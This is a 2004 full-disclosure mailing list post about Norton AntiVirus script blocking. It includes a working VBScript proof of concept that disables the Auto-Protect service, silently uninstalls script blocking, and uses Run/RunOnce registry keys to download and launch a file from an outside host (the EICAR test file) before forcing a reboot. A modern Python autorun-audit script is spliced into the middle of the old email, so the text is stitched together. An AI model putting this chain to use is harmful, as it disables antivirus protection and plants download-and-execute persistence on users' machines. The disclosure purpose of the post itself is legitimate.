Subject: [VulnWatch] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)
Date: Thu, 11 Nov 2004 06:32:20 -0500
Hi All,

I have major issues with the quality of Norton AntiVirus. For some history, see:

 http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html
 - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)

 http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html
 - Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec's Response to this issue: (From a week ago)

"ScriptBlocking is intended to provide proactive detection against script-based worms and this component of Norton AntiVirus has been effective at doing this since its introduction in 2001"

Huh?

Below is a 'typical' script-based virus that Norton AntiVirus will allow a user to run, without *any* intervention on NAV's part whatsoever. It's likely that code similar to this is already appended to script-based threats/worms to assist their penetration in the wild.

In a nutshell, here's what it does:

On Reboot it sets...

1) The NAV Auto-Protect Service to DISABLED
2) A registry key to Uninstall Script Blocking
3) Creates, launches a VBScript file to d/l the EICAR AV 'test' virus
4) Launches the EICAR.COM test pattern a few seconds later

....Then Reboots your computer.

The following code was tested under WinXP and a fully LiveUpdated NAV 2005 using a broadband Internet connection. Should be fine for Win2000 and NAV 2004 as well.
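The persistence pattern just summarised (RunOnce values that schedule a silent msiexec uninstall or write .vbs files with `cmd /c ECHO ... > file.vbs`, Run values that launch those files, and the Auto-Protect service flipped to Disabled) is straightforward to audit for. The following is an added defender-side example, not code from the post or from Symantec: it evaluates a constructed snapshot of Run/RunOnce values and one Win32_Service-style record against those indicators. The value names and the uninstall product code mirror the post; the download host and the benign "VendorUpdater" entry are invented, and on a live host the tuples would come from `reg query` or WMI rather than the inline sample.

```python
"""Audit autorun values and AV service state for the persistence pattern
described in the post (added example; sample data is constructed)."""
import re
from dataclasses import dataclass

RUN = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUNONCE = r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
AUTORUN_KEYS = {RUN.lower(), RUNONCE.lower()}

# (reason, regex) pairs evaluated against each autorun value's data.
SUSPICIOUS_PATTERNS = [
    ("msiexec silent uninstall scheduled at boot",
     re.compile(r"msiexec(?:\.exe)?\s.*?/x\s*\{[0-9a-f-]{36}\}.*?/q", re.I)),
    ("autorun writes a script file via cmd echo redirection",
     re.compile(r"cmd(?:\.exe)?\s+/c\s+echo\b.*>\s*\S+\.(?:vbs|vbe|js|jse|wsf|hta)\b", re.I)),
    ("script downloader components (XMLHTTP plus ADODB.Stream)",
     re.compile(r"microsoft\.xmlhttp.*adodb\.stream", re.I | re.S)),
    ("autorun launches a script file directly",
     re.compile(r'^\s*"?(?:[wc]script(?:\.exe)?\s+)?"?[^\s"]+\.(?:vbs|vbe|js|jse|wsf)"?\s*$', re.I)),
]


@dataclass
class Finding:
    key: str
    value_name: str
    reasons: list


def audit_autoruns(entries):
    """entries: iterable of (key_path, value_name, data) tuples.
    Returns one Finding per value that matches at least one pattern."""
    findings = []
    for key, value_name, data in entries:
        if key.lower() not in AUTORUN_KEYS:
            continue
        reasons = [reason for reason, rx in SUSPICIOUS_PATTERNS if rx.search(data)]
        if reasons:
            findings.append(Finding(key, value_name, reasons))
    return findings


def audit_av_service(display_name, state, start_mode):
    """Check the two Win32_Service fields the post's script changes
    (State via StopService, StartMode via ChangeStartMode)."""
    issues = []
    if start_mode.lower() == "disabled":
        issues.append(f"{display_name}: StartMode is Disabled")
    if state.lower() != "running":
        issues.append(f"{display_name}: State is {state}, expected Running")
    return issues


# Constructed snapshot mirroring the post's registry writes, plus one
# ordinary-looking entry that must not be flagged.
SAMPLE_ENTRIES = [
    (RUNONCE, "Uninstall Norton Script Blocking",
     "MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q"),
    (RUNONCE, "Create Code Downloader",
     'cmd /c ECHO Set X=CreateObject("Microsoft.XMLHTTP"):X.open "GET",'
     '("http://example.invalid/sample.com"),False:X.send:set Y=createobject('
     '"adodb.stream"):Y.type=1:Y.open:Y.write X.responseBody:Y.savetofile('
     '"sample.com"),2:Y.close > estart.VBS'),
    (RUN, "Execute Code DownLoader", "estart.vbs"),
    (RUN, "Execute Malicious Code Launcher", "elaunch.vbs"),
    (RUN, "VendorUpdater", r'"C:\Program Files\Vendor\updater.exe" /background'),
]

if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_ENTRIES):
        print(f"[autorun] {f.key}\\{f.value_name}")
        for r in f.reasons:
            print(f"    - {r}")
    for issue in audit_av_service("Norton AntiVirus Auto-Protect Service",
                                  "Stopped", "Disabled"):
        print(f"[service] {issue}")
```

The script-launch pattern deliberately requires the whole value to be a bare script path (optionally prefixed by wscript/cscript), so the echo-redirection entry is reported under its own reason rather than double-counted as a launcher; the patterns are indicators to review, not proof of compromise.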

--------------//// BEGIN DISABLE_NAV.VBS ////-----------------

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

sServer = "."
Set oWMI = GetObject("winmgmts://.")

sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
    & "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
   oService.StopService
   oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues


' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open "+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.send:set Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close > estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues


' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd /k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues


' -------- LAUNCH EICAR DOWNLOADER ----------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues


' --------  RUN THE 'VIRUS' ----------

Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName, arrStringValues


' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

Set wmi    = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
 for each obj in objset
  set os = obj : exit for
 next
os.win32shutdown 2 + 4

--------------//// END DISABLE_NAV.VBS ////-----------------

Best Regards,
Daniel Milisic
